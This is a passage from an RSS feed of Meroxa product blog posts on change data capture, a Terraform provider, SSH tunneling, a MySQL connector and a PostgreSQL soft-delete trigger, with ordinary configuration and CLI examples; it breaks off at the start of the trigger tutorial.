&lt;p&gt;&lt;strong&gt;Need to be configured&lt;/strong&gt;: Enabling replication logs may require additional configuration, plugins, or even a database restart. Performing these changes with minimal downtime can be cumbersome and requires planning.&lt;/p&gt;
&lt;h3&gt;What’s Next?&lt;/h3&gt;
&lt;p&gt;Capturing the &lt;em&gt;changes&lt;/em&gt; of data is like a Swiss Army knife for any application architecture; it is useful for so many different types of problems. Listening, storing, and acting on the changes of any system — particularly a database — allows you to perform real-time data replication between two data stores, break up a monolithic application into scalable, event-driven microservices, or even power real-time UIs.&lt;/p&gt;
&lt;p&gt;Streaming replication logs, polling, and database triggers provide a mechanism to build a CDC system. Each has its own set of pros and cons specific to your application architecture and desired functionality.&lt;/p&gt;
&lt;p&gt;In the &lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-two&quot;&gt;next article in this series&lt;/a&gt;, we are going to dive into:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What are the ideal CDC use cases?&lt;/li&gt;
&lt;li&gt;Where can I get started with CDC?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can’t wait to see what you build 🚀.&lt;/p&gt;
&lt;p&gt;Special thanks to &lt;a href=&quot;https://twitter.com/criccomini&quot;&gt;@criccomini&lt;/a&gt;, &lt;a href=&quot;https://twitter.com/andyhattemer&quot;&gt;@andyhattemer&lt;/a&gt;, &lt;a href=&quot;https://twitter.com/misosoup&quot;&gt;@misosoup&lt;/a&gt;, &lt;a href=&quot;https://twitter.com/devarispbrown&quot;&gt;@devarispbrown&lt;/a&gt;, and &lt;a href=&quot;https://twitter.com/neovintage&quot;&gt;@neovintage&lt;/a&gt; for helping me craft the ideas in this article!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Pipelines as Code with the Meroxa Terraform Provider]]></title><description><![CDATA[With the Meroxa CLI and the Meroxa Dashboard, your pipelines are streaming, real-time, and up and running in minutes, not months.]]></description><link>https://meroxa.com/blog/real-time-pipelines-as-code-with-the-meroxa-terraform-provider</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-pipelines-as-code-with-the-meroxa-terraform-provider</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Fri, 06 Aug 2021 15:29:00 GMT</pubDate><content:encoded>&lt;p&gt;Making production-ready pipelines still requires a significant amount of time and effort. With the Meroxa CLI and the Meroxa Dashboard, your pipelines are streaming, real-time, and up and running in minutes, not months. Today, we’re adding a new way for you to build pipelines with versioning, speed, and consistency.&lt;/p&gt;
&lt;p&gt;Introducing the Meroxa Terraform Provider. 🎉&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/560/1*Hi_PN-jtbSRsKtiiLYdgFg.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The provider allows you to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Provision, modify and destroy various objects on the Meroxa platform as code.&lt;/li&gt;
&lt;li&gt;Easily share pipelines with your team.&lt;/li&gt;
&lt;li&gt;Manage pipelines next to infrastructure managed with Terraform.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you’re new to &lt;a href=&quot;https://www.terraform.io/&quot;&gt;Terraform&lt;/a&gt;, it is an open-source infrastructure as code software tool that provides a workflow and tooling to manage cloud infrastructure. Using the &lt;a href=&quot;https://www.terraform.io/docs/language/providers/index.html&quot;&gt;Terraform Provider&lt;/a&gt;, you can add your data pipeline resources to the list of items that Terraform can manage. For more information, check out the &lt;a href=&quot;https://learn.hashicorp.com/terraform&quot;&gt;Terraform Getting Started Guide&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
&lt;p&gt;To get started with the Meroxa Terraform Provider, require it within your &lt;a href=&quot;https://www.terraform.io/docs/language/providers/requirements.html&quot;&gt;Terraform file&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;hcl&quot;&gt;&lt;pre class=&quot;language-hcl&quot;&gt;&lt;code class=&quot;language-hcl&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;terraform&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;required_providers&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;meroxa&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;version&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1.0&quot;&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;source&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;meroxa.io/meroxa/meroxa&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, you can define your Meroxa resources within this Terraform project.&lt;/p&gt;
&lt;p&gt;For example, here is a pipeline that can assist with a migration from PostgreSQL to MongoDB. It keeps both databases in sync in real time:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;hcl&quot;&gt;&lt;pre class=&quot;language-hcl&quot;&gt;&lt;code class=&quot;language-hcl&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# Require Provider &lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;terraform&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;required_providers&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;meroxa&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;version&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;0.1&quot;&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;source&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;meroxa.io/meroxa/meroxa&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Configure Provider&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;provider&lt;span class=&quot;token type variable&quot;&gt; &quot;meroxa&quot; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;access_token&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; var.access_token &lt;span class=&quot;token comment&quot;&gt;# optionally use MEROXA_ACCESS_TOKEN env var&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Define Pipeline&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_pipeline&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;pipeline&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;sync-postgres-mongo&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Configure Postgres Resource&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_resource&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-postgres&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;type&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;url&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;POSTGRES_CONNECTION_URL&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Configure MongoDB Resource&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_resource&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;mongo&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-mongo&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;type&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;mongodb&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;url&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_CONNECTION_URL&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# The PostgreSQL connector will capture CDC events for &lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;# every insert, update and delete operation from a Postgres table.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_connector&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;source&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;from-postgres&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;source_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_resource.postgres.id
  &lt;span class=&quot;token property&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;pipeline_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_pipeline.pipeline.id
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# The MongoDB connector will send data to a collection within MongoDB.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;resource &lt;span class=&quot;token type variable&quot;&gt;&quot;meroxa_connector&quot;&lt;/span&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;destination&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;to-mongo&quot;&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;destination_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_resource.mongo.id
  &lt;span class=&quot;token property&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_connector.source.streams&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;.output&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;pipeline_id&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;=&lt;/span&gt; meroxa_pipeline.pipeline.id
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once you’ve defined your pipeline, you can use the &lt;a href=&quot;https://www.terraform.io/docs/cli/commands/index.html&quot;&gt;Terraform CLI&lt;/a&gt; to create, update, and destroy your Meroxa Resources.&lt;/p&gt;
&lt;p&gt;Within the Meroxa Terraform Provider Documentation, you can view all the different configuration options for each resource type.&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help, reach out to &lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt; and &lt;a href=&quot;http://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can’t wait to see what you build 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Securely Communicate to Your Resources With SSH Tunneling]]></title><description><![CDATA[When you build a data pipeline using Meroxa, your data is encrypted in transit and at rest. Today’s platform update adds a new layer of security to Meroxa.]]></description><link>https://meroxa.com/blog/securely-communicate-to-your-resources-with-ssh-tunneling</link><guid isPermaLink="false">https://meroxa.com/blog/securely-communicate-to-your-resources-with-ssh-tunneling</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Thu, 15 Jul 2021 15:30:00 GMT</pubDate><content:encoded>&lt;p&gt;Data security is at the core of the Meroxa platform. When you build a data pipeline using Meroxa, your data is encrypted in transit and at rest. Today’s platform update adds a new layer of security to Meroxa.&lt;/p&gt;
&lt;p&gt;SSH Tunneling is now in public beta.&lt;/p&gt;
&lt;p&gt;With SSH Tunneling, you gain the ability to securely communicate between resources that are not publicly available over the Internet. Tunneling is supported for both sources and destinations.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*OEvGgFwEHfYXpvWmj5P8oA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
&lt;p&gt;To get started with SSH Tunneling, when you &lt;a href=&quot;https://docs.meroxa.com/cli/cmd/meroxa-resources-create&quot;&gt;create a resource&lt;/a&gt; via the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;, provide the new &lt;a href=&quot;https://docs.meroxa.com/cli/cmd/meroxa-resources-create&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;--ssh-url&lt;/code&gt;&lt;/a&gt; option.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*CeahNACvO3BrLgHQ_mgfOw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;This new option allows you to point to a bastion host that will be used for the resource connection. Typically, this host is publicly available to a fixed list of &lt;a href=&quot;https://docs.meroxa.com/platform/networking/meroxa-ips&quot;&gt;IP addresses&lt;/a&gt; and has access to resources that are not available to the public.&lt;/p&gt;
&lt;p&gt;After creation, Meroxa will provide a public key you can add to your bastion host environment. Then, you can immediately start building real-time pipelines.&lt;/p&gt;
&lt;p&gt;I can’t wait to see what you build 🚀&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help, reach out to &lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Introducing MySQL Connector Beta]]></title><description><![CDATA[MySQL, one of the most popular open-source databases for developers, is now in public beta as a source and destination for real-time data streams.]]></description><link>https://meroxa.com/blog/introducing-mysql-connector-beta</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-mysql-connector-beta</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Tue, 29 Jun 2021 15:25:00 GMT</pubDate><content:encoded>&lt;h3&gt;Real-time MySQL Change Data Capture (CDC) and ingestion&lt;/h3&gt;
&lt;p&gt;Meroxa is committed to making real-time data engineering simple. Part of this is giving you access to the databases engineers use most. Today, we’re happy to announce that MySQL, one of the most popular open-source databases for developers, is now in public beta as a source and destination for real-time data streams.&lt;/p&gt;
&lt;p&gt;As a source, you can build pipelines that act on changes from MySQL. For example, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Extract Transform Load (ETL) into a Data Warehouse.&lt;/li&gt;
&lt;li&gt;Keep a search index up-to-date.&lt;/li&gt;
&lt;li&gt;Replicate data to another database.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As a destination, you can capture events from &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/elasticsearch&quot;&gt;Elasticsearch&lt;/a&gt;, or &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;any other Meroxa source&lt;/a&gt; and send them to &lt;a href=&quot;https://docs.meroxa.com/platform/resources/mysql/setup&quot;&gt;MySQL&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;With Meroxa, it’s all streaming, real-time, and your pipelines will be up and running in minutes, not months.&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*WTlgjH5ZZ9gn5rbR&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;To begin sending data to MySQL, perform the following steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;http://dashboard.meroxa.io/&quot;&gt;Create an Account&lt;/a&gt; — Create an account using the &lt;a href=&quot;http://dashboard.meroxa.io/&quot;&gt;dashboard&lt;/a&gt; or the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/mysql/setup&quot;&gt;Setup&lt;/a&gt; — Set up your MySQL instance and acquire the credentials Meroxa needs to connect to it.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview#create-a-resource&quot;&gt;Add Resource&lt;/a&gt; — Use the &lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview#create-a-resource-1&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;meroxa resource create&lt;/code&gt;&lt;/a&gt; command to add it to your Meroxa Resource Catalog.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Then, you can start building pipelines.&lt;/p&gt;
&lt;h3&gt;MySQL Source Connector&lt;/h3&gt;
&lt;p&gt;As a source, you can capture changes from MySQL and send them to &lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-redshift&quot;&gt;Redshift&lt;/a&gt;, Webhooks, &lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;Amazon S3&lt;/a&gt;, or &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;any other destination&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The MySQL source is a CDC connector that leverages &lt;a href=&quot;https://dev.mysql.com/doc/refman/8.0/en/binary-log.html&quot;&gt;MySQL’s Binary Log&lt;/a&gt;. The binary log contains a list of every change event of a given MySQL instance. This connector will perform an initial snapshot of the data. Then, it will stream every &lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operation and push the events into a Meroxa stream.&lt;/p&gt;
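A toy model of that snapshot-then-stream behavior can make the ordering concrete. This is illustrative Python only, with the table and binlog as in-memory lists; the real connector speaks the MySQL binlog protocol:

```python
# Emit the current table contents first (snapshot), then every subsequent
# binlog operation (stream), so consumers see a complete, ordered history.
def snapshot_then_stream(table, binlog):
    for row in table:                      # 1. initial snapshot
        yield ("SNAPSHOT", row)
    for op, row in binlog:                 # 2. live change events
        yield (op, row)

table = [{"id": 1, "name": "Ada"}]
binlog = [("INSERT", {"id": 2, "name": "Grace"}),
          ("UPDATE", {"id": 1, "name": "Ada L."})]

stream = list(snapshot_then_stream(table, binlog))
print(stream)
```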
&lt;p&gt;This connector will emit data records in the following format:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/0*7P-pYmR1oAE7Ph-T&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;To create a source, you can use the &lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview#create-a-resource-1&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;meroxa connector create&lt;/code&gt;&lt;/a&gt; command to create a new connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa connector create from-mysql-connector &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--from&lt;/span&gt; my-mysql &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--input&lt;/span&gt; Users &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--pipeline&lt;/span&gt; my-pipeline&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For more, see the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/mysql/setup&quot;&gt;MySQL Source Connector Documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;MySQL Destination Connector&lt;/h3&gt;
&lt;p&gt;As a destination, you can capture events from a Meroxa source and send them to tables in MySQL.&lt;/p&gt;
&lt;p&gt;To create a destination, you can use the &lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;dashboard&lt;/a&gt; or the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview#create-a-resource-1&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;meroxa connector create&lt;/code&gt;&lt;/a&gt; command to create a new connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa connector create to-mysql-connector &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--to&lt;/span&gt; my-mysql &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--input&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;$STREAM_NAME&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;token parameter variable&quot;&gt;--pipeline&lt;/span&gt; my-pipeline&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For more, see the &lt;a href=&quot;https://docs.meroxa.com/platform/resources/mysql/setup&quot;&gt;MySQL Connector Documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I can’t wait to see what you build. 🚀&lt;/p&gt;
&lt;p&gt;&lt;em&gt;The MySQL connector is currently in beta. We encourage customers to start using the connector in their staging and development environments and provide feedback. Following the beta phase, we will make the connector generally available for use in all environments (dev, staging, and production). Meroxa follows this pattern for all connectors that it releases to ensure a great experience for you.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help, reach out to &lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Creating a Soft Delete Archive Table with PostgreSQL]]></title><description><![CDATA[Postgres Triggers and Functions are powerful features that allow you to listen for DELETE operations that occur within a table and insert the deleted row in a separate archive table.]]></description><link>https://meroxa.com/blog/creating-a-soft-delete-archive-table-with-postgresql</link><guid isPermaLink="false">https://meroxa.com/blog/creating-a-soft-delete-archive-table-with-postgresql</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Tue, 08 Jun 2021 20:01:00 GMT</pubDate><content:encoded>&lt;p&gt;Streaming from Postgres’ Logical replication log is the most efficient means of capturing changes with the least amount of overhead to your database. However, in some environments (i.e., unsupported versions, Heroku Postgres), you’re left with polling the database to monitor changes.&lt;/p&gt;
&lt;p&gt;Typically, when &lt;a href=&quot;https://docs.meroxa.com/docs/sources/postgres/connection-types/polling&quot;&gt;polling PostgreSQL&lt;/a&gt; to capture data changes, you can track the max value of a primary key (id) to know when an &lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt; operation occurred. Additionally, if your database has an &lt;code class=&quot;language-text&quot;&gt;updatedAt&lt;/code&gt; column, you can look at timestamp changes to capture &lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt; operations, but it’s much harder to capture &lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations.&lt;/p&gt;
&lt;p&gt;Postgres &lt;a href=&quot;https://www.postgresql.org/docs/9.1/sql-createtrigger.html&quot;&gt;Triggers&lt;/a&gt; and &lt;a href=&quot;https://www.postgresql.org/docs/9.1/sql-createfunction.html&quot;&gt;Functions&lt;/a&gt; are powerful features that allow you to listen for &lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations on a table and insert the deleted row into a separate archive table. You can consider this a method of performing &lt;a href=&quot;https://en.wiktionary.org/wiki/soft_deletion&quot;&gt;soft deletes&lt;/a&gt;, a model that helps you keep records for historical analysis or data recovery.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1120/1*4E8HnHt7jmYlIBq16Jij1A.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the commands below, we capture deletes from a table called &lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt;, and the trigger will insert the deleted row into a table called &lt;code class=&quot;language-text&quot;&gt;Deleted_User&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Step One: Create a new table&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;If you don’t have an archive table yet, you’ll need to create one. The easiest way is to copy the structure of the origin table:&lt;/p&gt;
